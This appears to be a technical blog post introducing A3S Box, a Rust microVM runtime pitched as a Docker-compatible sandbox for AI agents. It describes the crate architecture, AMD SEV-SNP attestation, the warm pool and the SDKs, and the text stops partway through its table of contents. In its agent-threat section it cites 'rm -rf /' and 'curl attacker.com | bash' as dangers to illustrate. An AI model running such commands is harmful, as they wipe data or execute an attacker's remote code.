Forem: Roy Lin

A 40MB MicroVM Runtime Written in Rust — A Perfect Docker Replacement for AI Agent Sandboxes

Roy Lin — Mon, 23 Feb 2026 19:12:22 +0000

When we strip away all the technical jargon and return to the essence of computing, a core question emerges: Can we run every workload on its own operating system kernel while maintaining container-level startup speed and developer experience? A3S Box answers with a definitive yes — a single 40MB binary, no daemon, 200ms cold start, 52 Docker-compatible commands, hardware-level isolation, and optional confidential computing.

Introduction: Why We Need to Rethink Container Runtimes
First Principles: Starting from the Fundamental Question
Architecture Overview: Seven Crates in Precise Collaboration
Core Value 1: True Hardware-Level Isolation
Core Value 2: Confidential Computing and Zero-Trust Security
Core Value 3: MicroVM with 200ms Cold Start
Core Value 4: Full Docker-Compatible Experience
Core Value 5: Secure Isolation Sandbox for AI Agents
Deep Dive: VM Lifecycle State Machine
TEE Confidential Computing: The Trust Chain from Hardware to Application
Vsock Communication Protocol: The Bridge Between Host and Guest
OCI Image Processing Pipeline: From Registry to Root Filesystem
Network Architecture: Three Flexible Modes
Guest Init: PID 1 Inside the MicroVM
Warm Pool: The Ultimate Solution to Cold Starts
Seven-Layer Defense-in-Depth Security Model
Observability: Prometheus, OpenTelemetry, and Auditing
Kubernetes Integration: CRI Runtime
SDK Ecosystem: Unified Rust, Python, and TypeScript
Comparative Analysis with Existing Solutions
Future Outlook and Summary

1. Introduction: Why We Need to Rethink Container Runtimes

Over the past decade, Docker and container technology have fundamentally transformed how software is delivered. Developers can package applications and their dependencies into a standardized image and run it in any environment that supports a container runtime. This "build once, run anywhere" philosophy has dramatically improved development efficiency and deployment consistency.

However, as cloud-native architectures have matured, the fundamental limitations of traditional container runtimes have become increasingly apparent:

The shared-kernel security dilemma. Traditional containers (such as runc used by Docker) are essentially Linux kernel process isolation mechanisms — resource isolation through namespaces and cgroups. But all containers share the same host kernel. This means a single kernel vulnerability (such as CVE-2022-0185 or CVE-2022-0847 "Dirty Pipe") can allow an attacker to escape from any container to the host, gaining control over all workloads on the same node.

The trust crisis in multi-tenant environments. In public cloud and edge computing scenarios, workloads from different tenants run on the same physical hardware. Even with container isolation, there is no hardware-level trust boundary between tenants. Cloud service provider administrators can theoretically access any tenant's in-memory data — which is unacceptable when handling medical records, financial data, or personal privacy information.

The performance-security tradeoff. Existing solutions either sacrifice performance for security (traditional VMs take seconds to tens of seconds to start) or sacrifice security for performance (containers provide insufficient isolation strength). Projects like Kata Containers and Firecracker attempt to find a balance between the two, but each still has its own limitations.

A3S Box was created precisely to fundamentally resolve this contradiction.

📖 For complete documentation and API reference, visit: https://a3s-lab.github.io/a3s/

2. First Principles: Starting from the Fundamental Question

To understand A3S Box's design decisions, we need to set aside analogies and conventions, return to the most basic facts, and reason upward from there. Let's re-examine "running a workload" through this lens.

2.1 What Is the Essence of Workload Isolation?

From a physics perspective, isolation means there are no channels for information leakage between two systems. In computing, this means:

Memory isolation: Workload A cannot read or write workload B's memory space
Execution isolation: Workload A's code execution does not affect workload B's execution flow
I/O isolation: Workload A's input/output cannot be intercepted or tampered with by workload B
Temporal isolation: Workload A's resource consumption does not cause performance degradation for workload B

Traditional containers only implement these isolations at the operating system level — through the kernel's namespace and cgroup mechanisms. But the kernel itself is shared, meaning the strength of isolation depends on the correctness of the kernel code. The Linux kernel has over 30 million lines of code, with hundreds of security vulnerabilities discovered each year. Relying on such a massive codebase to guarantee isolation is fundamentally unreliable.

2.2 Hardware Isolation Is the Only Fundamental Solution

If we cannot trust software to provide perfect isolation, the only option is to leverage hardware. Modern processors provide two levels of hardware isolation:

Level 1: Virtualization extensions (Intel VT-x / AMD-V / Apple HVF). The processor distinguishes between host mode (VMX root) and guest mode (VMX non-root) at the hardware level. Code running in guest mode cannot directly access the host's memory or devices; any sensitive operation triggers a VM Exit, handled by the host's VMM (Virtual Machine Monitor). This provides much stronger guarantees than OS-level isolation.

Level 2: Memory encryption (AMD SEV-SNP / Intel TDX). Going further, modern processors can hardware-encrypt a virtual machine's memory. Even an attacker with physical access (including cloud service provider administrators) cannot read the plaintext data in VM memory. This is what's known as "Confidential Computing."

2.3 A3S Box's Core Insight

A3S Box's core insight can be summarized in one sentence:

MicroVM + Confidential Computing + Container Experience = Unity of Security and Efficiency

Specifically:

One MicroVM per workload: Using libkrun to start a lightweight virtual machine in ~200ms, each workload has its own independent Linux kernel. This is not container-level "fake isolation" but hardware-enforced true isolation.
Optional confidential computing: On hardware supporting AMD SEV-SNP, the MicroVM's memory is hardware-encrypted. Even if the host machine is completely compromised, attackers cannot read data inside the MicroVM.
Docker-compatible user experience: 52 Docker-compatible commands — developers don't need to learn new tools. a3s-box run nginx is as simple as docker run nginx, but with a completely different security model underneath.

The combination of these three elements makes A3S Box not an incremental improvement over existing container runtimes, but a paradigm shift — from "process isolation with a shared kernel" to "hardware isolation with independent kernels."

2.4 Why libkrun?

When choosing a virtualization backend, A3S Box selected libkrun over QEMU or Firecracker. This choice also went through rigorous technical evaluation:

Dimension	QEMU	Firecracker	libkrun
Startup time	Seconds	~125ms	~200ms
Memory overhead	Tens of MB	~5 MB	~10 MB
Code complexity	Very high (millions of lines)	Medium	Low (library form)
macOS support	Limited	Not supported	Native HVF
Linux support	KVM	KVM	KVM
Embedding method	Separate process	Separate process	Library call

libkrun's unique advantage is that it is a library rather than a standalone process. This means A3S Box can embed the VMM directly into its own process space, reducing inter-process communication overhead, while providing native support on macOS through Apple Hypervisor Framework (HVF) — which is critical for developer experience, as many developers use macOS for daily development.

3. Architecture Overview: Seven Crates in Precise Collaboration

A3S Box is written in Rust, with the entire project consisting of seven crates, 218 source files, 1,466 unit tests, and 7 integration tests. This modular design follows the "minimal core + external extensions" architectural philosophy.

3.1 Crate Topology

┌─────────────────────────────────────────────────────────────────┐
│                        a3s-box-cli                              │
│                  52 Docker-compatible commands                   │
│                       (361 tests)                               │
├─────────────────────────────────────────────────────────────────┤
│                       a3s-box-sdk                               │
│              Rust / Python / TypeScript SDK                     │
├──────────────────────┬──────────────────────────────────────────┤
│   a3s-box-cri        │           a3s-box-runtime                │
│  Kubernetes CRI      │  VM lifecycle, OCI, TEE, networking      │
│                      │           (678 tests)                    │
├──────────────────────┴──────────────────────────────────────────┤
│                       a3s-box-core                              │
│        Config, error types, events, Trait definitions           │
│                       (331 tests)                               │
├─────────────────────────────────────────────────────────────────┤
│  a3s-box-shim        │        a3s-box-guest-init                │
│  libkrun bridge shim │  Guest PID 1 / Exec / PTY / Attestation  │
├──────────────────────┴──────────────────────────────────────────┤
│                      libkrun-sys                                │
│                   libkrun FFI bindings                          │
└─────────────────────────────────────────────────────────────────┘

3.2 Crate Responsibilities

a3s-box-core (Core Layer): Defines all core abstractions — configuration structs, error types (BoxError enum with 15 variants), event system, and key Trait interfaces. This is the "contract layer" of the entire system; all other crates depend on it, but it depends on no other A3S crates.

a3s-box-runtime (Runtime Layer): Implements VM lifecycle management, OCI image pulling and caching, TEE confidential computing, network configuration, warm pool, auto-scaling, and other core functionality. This is the most complex crate in the system, with 678 unit tests.

a3s-box-cli (CLI Layer): Provides 52 Docker-compatible commands and is the primary interface for user interaction with the system. It translates user commands into calls to the runtime layer.

a3s-box-shim (VMM Bridge Layer): Runs as an independent subprocess, responsible for calling the libkrun FFI interface to create and manage MicroVMs. This process-isolation design ensures that a VMM crash does not affect the main process.

a3s-box-guest-init (Guest Initialization): Compiled as a static binary, runs as PID 1 inside the MicroVM. Responsible for mounting filesystems, configuring networking, and starting Exec/PTY/Attestation servers.

a3s-box-cri (Kubernetes Integration Layer): Implements the CRI (Container Runtime Interface) protocol, allowing A3S Box to run as a Kubernetes RuntimeClass.

a3s-box-sdk (SDK Layer): Provides an embedded Rust SDK, and generates Python and TypeScript bindings via PyO3 and napi-rs respectively.

3.3 Core Trait System

A3S Box's extensibility is built on a set of carefully designed Traits. These Traits define the system's extension points, and each Trait has a default implementation to ensure the system works out of the box:

Trait	Responsibility	Default Implementation
`VmmProvider`	Start VM from InstanceSpec	`VmController` (shim subprocess)
`VmHandler`	Lifecycle operations for running VMs	`ShimHandler`
`ImageRegistry`	OCI image pulling and caching	`RegistryPuller`
`CacheBackend`	Directory-level LRU cache	`RootfsCache`
`MetricsCollector`	Runtime metrics collection	`RuntimeMetrics` (Prometheus)
`TeeExtension`	TEE attestation, sealing, key injection	`SnpTeeExtension`
`AuditSink`	Audit event persistence	JSON-lines file
`CredentialProvider`	Registry authentication	Docker config.json
`EventBus`	Event publish/subscribe	`EventEmitter` (tokio broadcast)

The elegance of this design lies in: the core components (5) remain stable and non-replaceable, while the extension points (14) can evolve independently. Users can replace any extension without touching the core — this is the embodiment of the "minimal core + external extensions" principle.

4. Core Value 1: True Hardware-Level Isolation

4.1 From Namespaces to Hypervisor

The isolation model of traditional containers can be compared to "different rooms in the same building" — there are walls between rooms (namespaces), but they share the same foundation (kernel). If the foundation cracks, all rooms are affected.

A3S Box's isolation model is "a separate building for each workload" — each MicroVM has its own Linux kernel, isolated from the host through hardware virtualization extensions (Intel VT-x / AMD-V / Apple HVF). Even if an attacker gains root privileges inside a MicroVM and exploits a kernel vulnerability, they can only affect that MicroVM itself — because the VM Exit mechanism ensures that any sensitive operation must be reviewed by the host's VMM.

4.2 Layered Isolation

A3S Box doesn't rely solely on virtualization for isolation. It also stacks multiple OS-level isolation layers inside the MicroVM, forming a defense-in-depth:

┌─────────────────────────────────────────┐
│            Application Process           │
├─────────────────────────────────────────┤
│  Seccomp BPF │ Capabilities │ no-new-priv│  <- Syscall level
├─────────────────────────────────────────┤
│  Mount NS │ PID NS │ IPC NS │ UTS NS    │  <- Namespace level
├─────────────────────────────────────────┤
│  cgroup v2 (CPU/Memory/PID limits)      │  <- Resource limit level
├─────────────────────────────────────────┤
│           Independent Linux Kernel       │  <- Kernel level
├─────────────────────────────────────────┤
│     Hardware Virtualization (VT-x / AMD-V / HVF)  │  <- Hardware level
├─────────────────────────────────────────┤
│  AMD SEV-SNP / Intel TDX (optional)     │  <- Memory encryption level
└─────────────────────────────────────────┘

This multi-layer stacking design means that even if one layer is breached, the attacker still faces obstacles from other layers. This is not "choose the strongest single layer," but "every layer increases the cost of attack."

4.3 Guest Init's Secure Boot Chain

The PID 1 process inside the MicroVM (a3s-box-guest-init) is a critical link in the security model. It is compiled as a statically linked Rust binary, with no dependency on any dynamic libraries, minimizing the attack surface.

Guest Init startup sequence:

Mount base filesystems: /proc (procfs), /sys (sysfs), /dev (devtmpfs)
Mount virtio-fs shared filesystem (rootfs passed in from host)
Configure network interface (via raw syscalls, no dependency on iproute2)
Apply security policies (Seccomp, Capabilities, no-new-privileges)
Start three vsock servers:
- Port 4089: Exec server (command execution)
- Port 4090: PTY server (interactive terminal)
- Port 4091: Attestation server (TEE attestation, TEE mode only)
Wait for host connection

The entire process requires no systemd, no shell, no userspace tools — this is a minimal, security-designed initialization flow.

5. Core Value 2: Confidential Computing and Zero-Trust Security

5.1 What Is Confidential Computing?

Confidential Computing is a hardware security technology that protects data while it is being processed (in-use). Traditional security measures protect data at rest (via disk encryption) and data in transit (via TLS), but data being processed typically exists in plaintext in memory.

AMD SEV-SNP (Secure Encrypted Virtualization - Secure Nested Paging) changes this through the following mechanisms:

Memory encryption: Each virtual machine has an independent AES encryption key, managed by the processor's security processor (PSP). The host's VMM cannot read the VM's memory in plaintext.
Integrity protection: SNP (Secure Nested Paging) adds memory integrity protection on top of SEV-ES, preventing the host from tampering with the VM's memory contents.
Remote attestation: The VM can generate a hardware-signed attestation report, proving it is running on genuine AMD SEV-SNP hardware and that the initial memory contents (measurement) have not been tampered with.

5.2 A3S Box's TEE Implementation

A3S Box's TEE subsystem contains 12 modules, covering the complete chain from hardware detection to application-layer key management:

Hardware detection: At system startup, the system automatically probes /dev/sev-guest, /dev/sev, /dev/tdx_guest device files, and the /sys/module/kvm_amd/parameters/sev_snp parameter. If hardware is unavailable but the A3S_TEE_SIMULATE=1 environment variable is set, it enters simulation mode — which is critical for development and testing.

Attestation report generation: When a verifier sends an AttestationRequest containing a nonce and optional user_data, Guest Init combines them via SHA-512 into a 64-byte report_data, then calls the /dev/sev-guest device via SNP_GET_REPORT ioctl to generate an attestation report. The report is 1184 bytes and contains:

Offset 0x00-0x04: version (u32 LE)        — report format version
Offset 0x04-0x08: guest_svn (u32 LE)      — guest security version number
Offset 0x08-0x10: policy (u64 LE)         — security policy flags
Offset 0x38-0x40: current_tcb             — trusted computing base version
Offset 0x90-0xC0: measurement (48 bytes)  — SHA-384 hash of initial memory
Offset 0x1A0-0x1E0: chip_id (64 bytes)   — physical processor unique identifier

Certificate chain verification: A3S Box implements complete AMD certificate chain verification:

AMD Root Key (ARK)          <- AMD's hardcoded root trust anchor
    |
    +-- AMD SEV Key (ASK)   <- Intermediate certificate
    |       |
    |       +-- VCEK        <- Chip-level certificate (unique per physical processor)
    |               |
    |               +-- SNP Report Signature  <- Attestation report signature

Certificates are obtained from AMD's KDS (Key Distribution Service): https://kds.amd.com/vcek/v1/{product}/{chip_id}, and cached locally to avoid repeated network requests.

5.3 RA-TLS: Embedding Attestation into TLS

RA-TLS (Remote Attestation TLS) is a key innovation in A3S Box. It embeds the SNP attestation report into the extension fields of an X.509 certificate, so that the TLS handshake process simultaneously completes both identity verification and remote attestation.

This means: when the host establishes a TLS connection with the MicroVM, it not only verifies the identity of the communication peer, but also verifies that the peer is indeed running in a trusted TEE environment. This eliminates the TOCTOU (Time-of-Check-Time-of-Use) vulnerability that arises from separating attestation and communication in traditional approaches.

5.4 Sealed Storage

Sealed Storage allows a MicroVM to encrypt and persist sensitive data, which can only be decrypted in the same (or compatible) TEE environment. A3S Box uses AES-256-GCM encryption, HKDF-SHA256 key derivation, and provides three sealing policies:

Policy	Binding Factor	Use Case
`MeasurementAndChip`	Image hash + physical chip ID	Strictest: data bound to specific image and specific hardware
`MeasurementOnly`	Image hash only	Can migrate across hardware, but must be the same image
`ChipOnly`	Physical chip ID only	Survives firmware updates, but bound to specific hardware

Additionally, sealed storage implements version-based rollback protection (VersionStore), preventing attackers from replacing newer sealed data with older versions.

6. Core Value 3: MicroVM with 200ms Cold Start

6.1 Why Does Startup Speed Matter?

In serverless and event-driven architectures, workload lifetimes may be only a few hundred milliseconds to a few seconds. If a virtual machine takes seconds to start, the startup overhead would account for a large proportion of the total workload time, making MicroVM solutions impractical in these scenarios.

A3S Box achieves approximately 200ms cold start time through libkrun. This number means:

For a serverless function with 1-second execution time, startup overhead is only 20%
For interactive workloads, users barely perceive the startup delay
In CI/CD scenarios, each build step can run in an independent MicroVM without significantly increasing total build time

6.2 Startup Flow Optimization

A3S Box's startup flow is carefully optimized:

[0ms]    VmController::start() is called
[5ms]    Locate a3s-box-shim binary
[10ms]   macOS: check/sign hypervisor entitlement
[15ms]   Serialize InstanceSpec to JSON
[20ms]   Start shim subprocess
[25ms]   shim calls libkrun FFI to create VM context
[30ms]   Configure vCPU, memory, virtio-fs, vsock
[50ms]   libkrun starts VM (kernel boot)
[150ms]  Guest Init (PID 1) begins execution
[160ms]  Mount filesystems
[170ms]  Configure networking
[180ms]  Start vsock servers
[200ms]  VM ready, accepting commands

6.3 Warm Pool: Eliminating Cold Starts

For scenarios extremely sensitive to latency, A3S Box provides a Warm Pool mechanism — pre-starting a batch of MicroVMs so that when a request arrives, a ready VM is directly allocated, achieving near-zero startup latency.

Core warm pool parameters:

min_idle: Minimum number of idle VMs (default 1)
max_size: Maximum number of VMs in the pool (default 5)
idle_ttl_secs: Idle VM time-to-live (default 300 seconds)

The warm pool also integrates an auto-scaler (PoolScaler) that dynamically adjusts min_idle based on hit/miss rates within a sliding window:

When the miss rate exceeds scale_up_threshold (default 0.3), increase the number of pre-warmed VMs
When the miss rate falls below scale_down_threshold (default 0.05), decrease the number of pre-warmed VMs
A cooldown period (default 60 seconds) prevents frequent oscillation

7. Core Value 4: Full Docker-Compatible Experience

7.1 52 Docker-Compatible Commands

A3S Box provides 52 Docker CLI-compatible commands, covering all aspects of container lifecycle management. Developers can seamlessly migrate existing Docker workflows to A3S Box without modifying scripts or learning new command syntax.

Core command examples:

# Run a MicroVM (equivalent to docker run)
a3s-box run -d --name my-app -p 8080:80 nginx:latest

# Execute a command (equivalent to docker exec)
a3s-box exec my-app cat /etc/nginx/nginx.conf

# Interactive terminal (equivalent to docker exec -it)
a3s-box exec -it my-app /bin/bash

# View logs
a3s-box logs my-app

# List running MicroVMs
a3s-box ps

# Stop and remove
a3s-box stop my-app
a3s-box rm my-app

# Image management
a3s-box images
a3s-box pull ubuntu:22.04
a3s-box push myregistry.io/my-image:v1

# Network management
a3s-box network create my-network
a3s-box network connect my-network my-app

# Volume management
a3s-box volume create my-data
a3s-box run -v my-data:/data my-app

# Audit query
a3s-box audit --filter "action=exec"

7.2 Why Is Compatibility So Important?

From a technology adoption perspective, whether a new technology is widely accepted depends on two factors: value increment and migration cost.

A3S Box's value increment is enormous — upgrading from shared-kernel isolation to hardware-level isolation, with optional confidential computing. But if the migration cost is equally enormous (needing to rewrite all deployment scripts, learn a completely new CLI, change team workflows), most teams will choose to stay with existing solutions.

By providing a Docker-compatible CLI, A3S Box reduces migration cost to a minimum:

# Before migration
docker run -d --name app -p 8080:80 nginx

# After migration (just replace the command name)
a3s-box run -d --name app -p 8080:80 nginx

This is not just a command name replacement. A3S Box is compatible with Docker's image format (OCI standard), network model, volume mount semantics, and environment variable passing. Existing Dockerfiles can be used without modification.

8. Core Value 5: Secure Isolation Sandbox for AI Agents

8.1 Security Challenges in the AI Agent Era

Large language model (LLM)-driven AI Agents are evolving from "conversational assistants" to "autonomous executors" — they not only generate text, but can also write code, call tools, manipulate filesystems, and initiate network requests. This leap in capability brings entirely new security challenges:

Untrusted code execution. Code generated by AI Agents is inherently untrusted. Even the most advanced LLMs may generate malicious code due to hallucination, prompt injection, or adversarial inputs. Executing such code in an unprotected environment is equivalent to handing control of the host machine to an unpredictable entity.

Side effects of tool calls. Agents interact with the external world through tools — executing shell commands, reading/writing files, accessing databases, calling APIs. Each tool call may produce irreversible side effects. If an Agent directly executes rm -rf / or curl attacker.com | bash on the host machine, the consequences would be catastrophic.

Multi-tenant Agent platforms. SaaS platforms run Agents from different users, each with different permission levels and trust levels. A malicious user's Agent should not be able to affect other users' Agents or the platform itself.

8.2 Why Traditional Containers Are Not Enough?

Many AI Agent frameworks use Docker containers as sandboxes. But as analyzed in Section 1, traditional container isolation is based on the shared-kernel namespace mechanism — a single kernel vulnerability can allow malicious code generated by an Agent to escape to the host machine.

For AI Agent scenarios, this risk is amplified:

Larger attack surface: Agents may execute arbitrary syscalls, increasing the probability of probing kernel vulnerabilities
Higher attack frequency: Agents continuously generate and execute code, with each execution being a potential attack attempt
Higher attack intelligence: LLMs have the ability to understand and exploit vulnerabilities, unlike traditional random fuzzing

A3S Box's MicroVM isolation fundamentally solves this problem — even if code generated by an Agent exploits a zero-day Linux kernel vulnerability, it cannot break through the hardware virtualization boundary.

8.3 SDK-Driven Sandbox Integration

A3S Box is not just a command-line tool, but an embeddable sandbox runtime. Through Rust/Python/TypeScript SDKs, AI Agent frameworks can integrate A3S Box directly into their own code as a library:

Python Agent framework integration example:

from a3s_box import BoxSdk, SandboxOptions

class SecureAgentExecutor:
    def __init__(self):
        self.sdk = BoxSdk()

    async def execute_agent_code(self, code: str, language: str = "python"):
        """Execute Agent-generated code in an isolated sandbox"""

        # Create a one-time sandbox (independent MicroVM)
        sandbox = self.sdk.create(SandboxOptions(
            image=f"{language}:3.11",
            vcpus=2,
            memory_mib=512,
        ))

        # Execute untrusted code in the sandbox
        result = sandbox.exec([language, "-c", code])

        return {
            "stdout": result.stdout,
            "stderr": result.stderr,
            "exit_code": result.exit_code,
        }
        # sandbox is automatically destroyed when scope ends

TypeScript Agent framework integration example:

import { BoxSdk } from '@a3s/box';

class SecureToolExecutor {
    private sdk = new BoxSdk();

    async executeShellCommand(command: string): Promise<ToolResult> {
        // Each tool call executes in an independent MicroVM
        const sandbox = await this.sdk.create({
            image: 'ubuntu:22.04',
            vcpus: 1,
            memoryMib: 256,
        });

        const output = await sandbox.exec(['bash', '-c', command]);

        return {
            success: output.exitCode === 0,
            output: output.stdout,
            error: output.stderr,
        };
    }
}

The key advantage of this integration pattern is: each code execution takes place in a brand new, isolated MicroVM. Even if an Agent performs destructive operations in one execution (deleting files, modifying system configuration), it only affects that MicroVM itself — the next execution will start in a clean environment.

8.4 Warm Pool Accelerates Agent Response

AI Agents typically follow a "think-execute-observe" loop — the Agent generates code, executes it, observes the output, then decides the next step. The speed of this loop directly affects user experience.

If each execution requires a 200ms cold start, an Agent task with 10 tool calls would add 2 seconds of extra latency. The warm pool mechanism plays a key role here:

Without warm pool:  [200ms start] [exec] [200ms start] [exec] [200ms start] [exec] ...
                                                    Total extra latency: N x 200ms

With warm pool:     [~0ms acquire] [exec] [~0ms acquire] [exec] [~0ms acquire] [exec] ...
                                                    Total extra latency: ~0ms

The warm pool's auto-scaling is particularly suited for Agent scenarios — Agent tool calls are typically bursty (dense calls during a task, idle between tasks), and PoolScaler automatically adjusts the number of pre-warmed VMs based on hit rate.

8.5 Seven-Layer Defense Against Agent Threats

Each layer of A3S Box's seven-layer defense-in-depth has a clear defensive target in AI Agent scenarios:

Defense Layer	Agent Threat Countered
Hardware virtualization	Agent exploiting kernel vulnerabilities to escape
TEE memory encryption	Agent attempting to read other tenants' memory data
Independent kernel	Agent's kernel-level attacks don't affect other sandboxes
Namespaces	Agent cannot see processes and files outside the sandbox
Capability stripping	Agent cannot perform privileged operations (e.g., mounting devices)
Seccomp BPF	Agent cannot call dangerous syscalls (e.g., `kexec_load`)
no-new-privileges	Agent cannot escalate privileges via SUID binaries

8.6 Auditing and Compliance

In AI Agent platforms, audit capability is not only a security requirement but also a compliance requirement. Regulators are increasingly focused on the traceability of AI systems — "What did the AI do? When? What was the result?"

A3S Box's 26 audit operations completely record every action of an Agent:

Which sandboxes the Agent created (Create)
Which commands the Agent executed (Command)
Which images the Agent pulled (Pull)
Whether the Agent's operations succeeded (Success / Failure / Denied)

These audit logs are stored in structured JSON-lines format and can be imported into any log analysis system for post-hoc review.

8.7 Lightweight Deployment: ~40MB Complete Runtime

The compiled binary size of A3S Box is only about 40MB — this includes the complete CLI, runtime, OCI image processing, TEE support, network management, warm pool, audit system, and all other functionality.

The significance of this number:

Compared to Docker Engine: Docker's full installation exceeds 200MB and requires multiple components like containerd and runc
Compared to QEMU: QEMU's installation package typically exceeds 100MB and depends on many dynamic libraries
Edge deployment friendly: A 40MB single binary can be easily deployed to IoT devices, edge nodes, and other storage-constrained environments
Minimal container image: A3S Box itself can be packaged as a minimal container image, making it easy to deploy as a DaemonSet in Kubernetes

This extreme binary size is thanks to Rust's zero-cost abstractions and compile-time optimization — no runtime virtual machine, no garbage collector, no large standard library runtime. The statically linked Guest Init binary is only a few MB, ensuring a minimal attack surface inside the MicroVM.

For AI Agent platforms, lightweight deployment means A3S Box can be quickly deployed on each compute node without consuming precious disk space and network bandwidth. Combined with the warm pool mechanism, the entire system can scale from zero to hundreds of isolated sandboxes within minutes.

9. Deep Dive: VM Lifecycle State Machine

9.1 BoxState State Machine

A3S Box uses a strictly defined state machine to manage the lifecycle of each MicroVM. The state machine implements concurrency-safe state synchronization through RwLock:

Created --> Ready --> Busy --> Ready
   |          |         |        |
   |          |         |        +--> Compacting --> Ready
   |          |         |
   |          +---------+-----------> Stopped
   |
   +-----------------------------------> Stopped

State meanings:

Created: VM configuration has been generated but not yet started. At this point, InstanceSpec has been fully constructed, containing vCPU count, memory size, rootfs path, entrypoint, network configuration, TEE configuration, and all other parameters.
Ready: VM has started and is ready to accept commands. Guest Init has completed initialization, and vsock servers are listening.
Busy: VM is executing a command (exec or PTY session). In this state, new command requests are queued.
Compacting: VM is performing internal maintenance operations (such as log rotation, cache cleanup). This is a brief transitional state.
Stopped: VM has stopped. Can transition to this state from any state (normal shutdown or abnormal termination).

9.2 VmController Startup Flow in Detail

VmController is the default implementation of the VmmProvider trait, responsible for transforming an InstanceSpec into a running MicroVM:

// Simplified startup flow
impl VmmProvider for VmController {
    async fn start(&self, spec: InstanceSpec) -> Result<Box<dyn VmHandler>> {
        // 1. Locate shim binary
        let shim_path = Self::find_shim()?;

        // 2. macOS: ensure hypervisor entitlement
        #[cfg(target_os = "macos")]
        ensure_entitlement(&shim_path)?;

        // 3. Serialize configuration
        let config_json = serde_json::to_string(&spec)?;

        // 4. Start shim subprocess
        let child = Command::new(&shim_path)
            .arg("--config")
            .arg(&config_json)
            .stdin(Stdio::null())
            .spawn()?;

        // 5. Return ShimHandler
        Ok(Box::new(ShimHandler::from_child(child)?))
    }
}

Shim location strategy (find_shim) searches in priority order:

Same directory as the current executable
~/.a3s/bin/ user directory
target/debug or target/release (development mode)
System PATH

This multi-level search strategy ensures the shim binary can be correctly found in development, testing, and production environments.

9.3 macOS Entitlement Signing

On macOS, using Apple Hypervisor Framework (HVF) requires the binary to have the com.apple.security.hypervisor entitlement. A3S Box handles this automatically:

fn ensure_entitlement(shim_path: &Path) -> Result<()> {
    // Use file lock to prevent concurrent signing race conditions
    let lock = FileLock::new(shim_path.with_extension("lock"))?;
    let _guard = lock.lock()?;

    // Check if already signed
    if has_entitlement(shim_path, "com.apple.security.hypervisor")? {
        return Ok(());
    }

    // Sign with codesign
    Command::new("codesign")
        .args(["--sign", "-", "--entitlements", entitlements_plist, 
               "--force", shim_path.to_str().unwrap()])
        .status()?;

    Ok(())
}

The file lock mechanism ensures that no signing race conditions occur when multiple A3S Box instances start simultaneously.

9.4 Graceful Shutdown and Forced Termination

VM shutdown follows a two-phase protocol:

Graceful shutdown: Send the configured signal (default SIGTERM) to the shim process, then poll try_wait() every 50ms, waiting up to timeout_ms (default 10,000ms).
Forced termination: If still not exited after timeout, escalate to SIGKILL.
Exit code collection: Collect the subprocess exit code via wait().

For attached mode (without a Child handle), use libc::waitpid with the WNOHANG flag for non-blocking polling.

10. TEE Confidential Computing: The Trust Chain from Hardware to Application

10.1 Building the Trust Chain

The core challenge of confidential computing is: How do we establish trust in the runtime environment inside a MicroVM without trusting the host machine?

A3S Box solves this through the following trust chain:

AMD Silicon (Physical Hardware)
    |
    +-- PSP (Platform Security Processor)
    |   +-- Manages AES encryption keys for each VM
    |
    +-- ARK (AMD Root Key) -- hardcoded in chip
    |   +-- ASK (AMD SEV Key) -- intermediate CA
    |       +-- VCEK (Versioned Chip Endorsement Key) -- chip unique
    |           +-- SNP Report Signature -- attestation report signature
    |
    +-- Measurement (SHA-384)
        +-- Hash of initial guest memory
            +-- Proves code loaded at VM startup has not been tampered with

The root anchor of this trust chain is AMD's physical silicon — which cannot be forged by software. From silicon to attestation report, every step has cryptographic guarantees.

10.2 Attestation Policy Engine

A3S Box implements a flexible attestation policy engine (AttestationPolicy), allowing verifiers to customize verification rules according to their security requirements:

pub struct AttestationPolicy {
    /// Expected initial memory hash (SHA-384)
    pub expected_measurement: Option<[u8; 48]>,

    /// Minimum TCB version requirement
    pub min_tcb: Option<TcbVersion>,

    /// Whether to require non-debug mode (should be true in production)
    pub require_no_debug: bool,

    /// Whether to require SMT disabled (prevents side-channel attacks)
    pub require_no_smt: bool,

    /// Allowed policy mask
    pub allowed_policy_mask: Option<u64>,

    /// Maximum report validity period (seconds)
    pub max_report_age_secs: Option<u64>,
}

Policy verification returns PolicyResult, containing pass/fail status and a specific list of violations (Vec<PolicyViolation>). This design allows verifiers to precisely understand which policies were violated, rather than a simple "pass/fail."

10.3 Re-attestation Mechanism

The security of a TEE environment is not a one-time thing — it requires continuous verification. A3S Box implements a periodic re-attestation mechanism:

pub struct ReattestConfig {
    /// Check interval (default 300 seconds)
    pub interval_secs: u64,

    /// Maximum consecutive failures (default 3)
    pub max_failures: u32,

    /// Grace period after startup (default 60 seconds)
    pub grace_period_secs: u64,
}

Re-attestation state tracking includes: startup time, last success time, last check time, consecutive failure count, and total count. When the consecutive failure count reaches the threshold, the system performs the corresponding action based on configuration:

Warn: Log warning and emit event
Event: Send security event to event bus
Stop: Stop the MicroVM

10.4 Key Injection Flow

In a TEE environment, keys cannot be passed through ordinary environment variables or file mounts (because the host is untrusted). A3S Box implements secure key injection via RA-TLS:

After the MicroVM starts, the Attestation server listens on vsock port 4091
The Key Broker Service (KBS) connects to the MicroVM via RA-TLS
During the TLS handshake, the MicroVM's certificate contains the SNP attestation report
KBS verifies the attestation report (measurement, TCB version, policy compliance)
After verification passes, KBS sends keys through the encrypted channel
Guest Init writes keys to /run/secrets/ (tmpfs, permissions 0400)
Application processes read keys from /run/secrets/

Throughout the entire process, keys never appear in plaintext outside the MicroVM.

11. Vsock Communication Protocol: The Bridge Between Host and Guest

11.1 Why Vsock?

In a MicroVM architecture, an efficient communication channel is needed between the host and guest. Traditional options include:

Network (TCP/IP): Requires configuring virtual network interfaces, adding complexity and attack surface
Shared memory: High performance but difficult to implement securely
Serial port: Simple but extremely low bandwidth
vsock (Virtio Socket): A socket interface designed specifically for VM communication, requiring no network configuration

Advantages of vsock:

Zero configuration: No IP addresses, routing tables, or firewall rules needed
Secure: The communication channel does not go through the network stack and cannot be intercepted by network-layer attackers
High performance: virtio-based shared memory transport with extremely low latency
Simple: Uses standard socket API (AF_VSOCK), programming model similar to TCP

11.2 Port Allocation

A3S Box allocates four dedicated ports on vsock:

Port	Service	Direction	Protocol
4088	gRPC Agent control	Bidirectional	Protobuf
4089	Exec server	Host->Guest	JSON + binary frames
4090	PTY server	Bidirectional	Binary frames
4091	Attestation server	Host->Guest	RA-TLS

11.3 Binary Frame Protocol

Exec and PTY servers use a unified binary frame format:

+----------+--------------+---------------------+
| type: u8 | length: u32  | payload: [u8; len]  |
| (1 byte) | (4 bytes BE) | (variable length)   |
+----------+--------------+---------------------+

